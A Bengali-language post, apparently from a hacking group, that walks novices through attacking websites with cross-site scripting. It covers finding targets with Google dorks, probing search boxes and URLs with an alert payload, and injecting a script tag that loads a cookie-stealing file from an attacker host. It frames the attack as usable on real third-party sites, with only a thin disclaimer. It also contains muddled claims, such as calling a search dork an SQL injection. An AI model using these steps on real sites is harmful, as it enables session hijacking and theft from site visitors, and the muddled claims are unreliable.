ওয়েবসাইট হ্যাকিং....😱😱😱

 ওয়েবসাইট হ্যাকিং

__________________________________________

আজকে আপনারে যে মেথডের মাধ্যমে ওয়েবসাইট হ্যাক করার কথা বলবো তার নাম XSS বা cross-site scripting

এ মেথডে আপনি ওয়েবসাইট হ্যাক করতে পারবেন🙂

বিঃদ্রঃ এ পোষ্ট শুধু শিক্ষনীয় কাজে ব্যাবহারের জন্য কেউ এর মাধ্যমে খারাপ কাজ করলে সেটার দায়ভার আমি বা এ গ্রুপ নিবেনা🙂

আর ভুলেও টেষ্ট করার সময় বাংলাদেশী সাইটে টেষ্ট করবেন না।

ধাপ ১: Vulnerable ওয়েব সাইট খুঁজে বের করা

একজন হ্যাকার প্রথমে Vulnerable সাইট খুজে বের করেন। এজন্য সে প্রথমে Google এ যায়। তারপর সে Google Dorks ব্যবহার করে Vulnerable সাইট খুজে বের করে। তাহলে আপনি তার সাথে সার্চ দিন নিচের sql Injection দিয়ে।

"search?q="

তাহলে আপনি অনেকগুলো Vulnerable সাইট খুজে পাবেন। এবার একটি সাইটে প্রবেশ করুন।

ধাপ ২: Vulnerability পরীক্ষা করা

এখন আমরা যে সাইটে প্রবেশ করেছি, সেই সাইটের Vulnerability পরীক্ষা করে দেখব। এজন্য আপনাকে প্রথমে উক্ত সাইটের এবটি পোষ্ট বা parameter খুঁজে বের করতে হবে। বুঝেছেন? না বুঝলে একটু অপেক্ষা করেন, বলছি। মানে আপনি এমন একটি পোষ্ট খুঁজে বের করবেন যা উক্ত সাইটের সার্ভার পাঠাবে। যেমনঃ search query, username, password.

Vulnerability পরীক্ষা করা জন্য দুটি পদ্ধতি আছে।

পদ্ধতি ১: প্রথম পদ্ধতি হল সাইটের মূল সার্চ বক্সে injection করা।

একজন হ্যাকার সাধারণত সাইটের মূল সার্চ বক্সে একটি malcious script লিখে, তারপর সার্চ বাটনে ক্লিক করে। সার্চ দেয়ার সাথে সাথে malcious script টি ওয়েবসাইটে কাজ করা শুরু করে দেয়।

undefined XSS এর সম্পূর্ণ টিউটোরিয়াল (নতুনদের জন্য) পর্ব- ৫

পদ্ধতি ২: সাইটের URL এ injection  করা।

এটি কোন সার্চ বক্সে কাজ করে না। এটি শুধু মাত্র সাইটের URL এ কাজ করে থাকে। যেমনঃ-

htp://vulnerablewebsite/search?q=malicious_script_goes_here

পরীক্ষা করার সুবিধার্থে  input fields হিসেবে নিচের কোডটি দিন।

<script>alert('hi');</script>

এবার উপরের কোডটি দিয়ে আপনি এবার পরীক্ষা করে দেখুন। যেমনঃ-

প্রথম পদ্ধতিঃ আপনি উপরের কোডটি আপনার ভিকটিমের সাইটের মূল সার্চ বক্সে লিখে সার্চ দেন।

দ্বিতীয় পদ্ধতিঃ আপনি ভিকটিমের সাইটের লিংকে লাগিয়ে এন্টার দিন। যেমনঃ-

http://vulnerablewebsite/search?q=<script>alert('TunerPage');</script>

এবার যদি ‘TunerPage’ লিখা একটি পপ আপ বক্স আসে। তাহলে বুঝবেন যে এই সাইটটি XSS এর জন্য vulnerable.

ধাপ ৩: Malicious Scripts দেয়া

Vulnerability পরীক্ষা করার পর একজন হ্যাকারের পরবর্তী কাজ হল, ভিকটিমের সাইটে malicious scripts ইঞ্জেকট করানো। এটি উক্তি সাইটের cookies চুরি করা এবং malware attack করতে সহযোগিতা করবে।

এখন মনে করুন হ্যাকারের সাইটে cookie stealing script টি আছে। তাহলে তার malicious script url হবে

http://attackerSite/malicious.js

এখন হ্যাকার তার malcious script টি vulnerable site এ inject  করতে পারবেন। তাহলে তার URL হবে

<script src=http://attackerSite/malicious.js></script>

এরপর যখনই উক্ত সাইটের ভিজিটর উক্ত সাইটে ভিজিট করবে, তখনি malcious script টি কাজ শুরু করে দিবে এবং কুকি চুরি করা শুরু করে দিবে।

সাধারণত XSS এর ক্ষমতা অনুসারে persisting capability হয় দুই ধরনের। একটা হল Persistent আরেকটা হল Non-Persistent

Persistent XSS:

এটা হল সবচেয়ে বেশি ঝুঁকিপূর্ণ XSS vulnerability. এটা সরাসরি সার্ভার থেকেই ডাটা সমূহ সংরক্ষণ করে থাকে। তাই আপনি যখনই উক্ত সাইটে malicious script injection দিবেন, সাথে সাথে এটি ওয়েব এ্যাপ্লিকেশানে স্থায়ীভাবে সংরক্ষণ হয়ে যাবে। এটি অন্যন্যা সকল ভিজিটরকে এটা দেখিয়ে দিবে।  যদি আপনি আপনার ভিকটিমের ওয়েব সাইটে malicious script injection করবেন, তাহলে এটি উক্ত সাইটে আসা ভিজিটরদেরও আক্রান্ত করে। যেমনঃ-  কিছু কিছু সাইট আছে, যারা তাদের সাইটের ব্যবহারকারিদের ট্যাক করার জন্য search query গুলো সংরক্ষণ করে রাখে। যার ফলাফল XSS এর permanent storage. :)

Non-Persistent XSS:

 একে অনেকেই Reflected XSS বলে থাকে। এজন্যই malicious script এখানে টেম্পরারী। ফলে আপনার দেয়া স্ক্রীপ্টটি সাধারণ ভিজিটররা দেখতে পারবে না। তবে হ্যাঁ, যারা হ্যাকার তারা তাদের দেয়া স্ক্রীপ্টটি ভিজিটরদের দেখানোর জন্য injection টিপস ব্যবহার করে থাকে। মজার বিষয় হল, যারা উক্ত সাইটের যারা নিয়মিত ভিজিটর তারা কিন্তু মনে করে যে এটা সাইটের নিজের লিংক। ফলে তারা সেখানে যায় আর তারও উক্ত সাইটের হ্যাকিংয়ের শিকার হয়। যেমনঃ-  আপনি কিছু কিছু সাইটে যে কোন জিনিস সার্চ দিলে দেখবেন আপনাদের আপনার দেয়া সার্চ স্ট্রিংটি আপনাকে পুনরায় দেখাচ্ছে। এটার কারণেই malicious code temporarily .

একজন হ্যাকার এই Vulnerability দিয়ে কি করে ?

১/পরিচয়পত্র ও বিভিন্ন গোপনীয় তথ্য চুরি করা।

২/ওয়েব সাই্টের Bypassing restriction

৩/Session Hijacking

৪/Malware Attack

৫/Website Defacement

৬/Dos attacks

আশা করি সবাই XSS এর বিষয়ে মোটামুটি ভাবে বুঝতে পেরেছেন।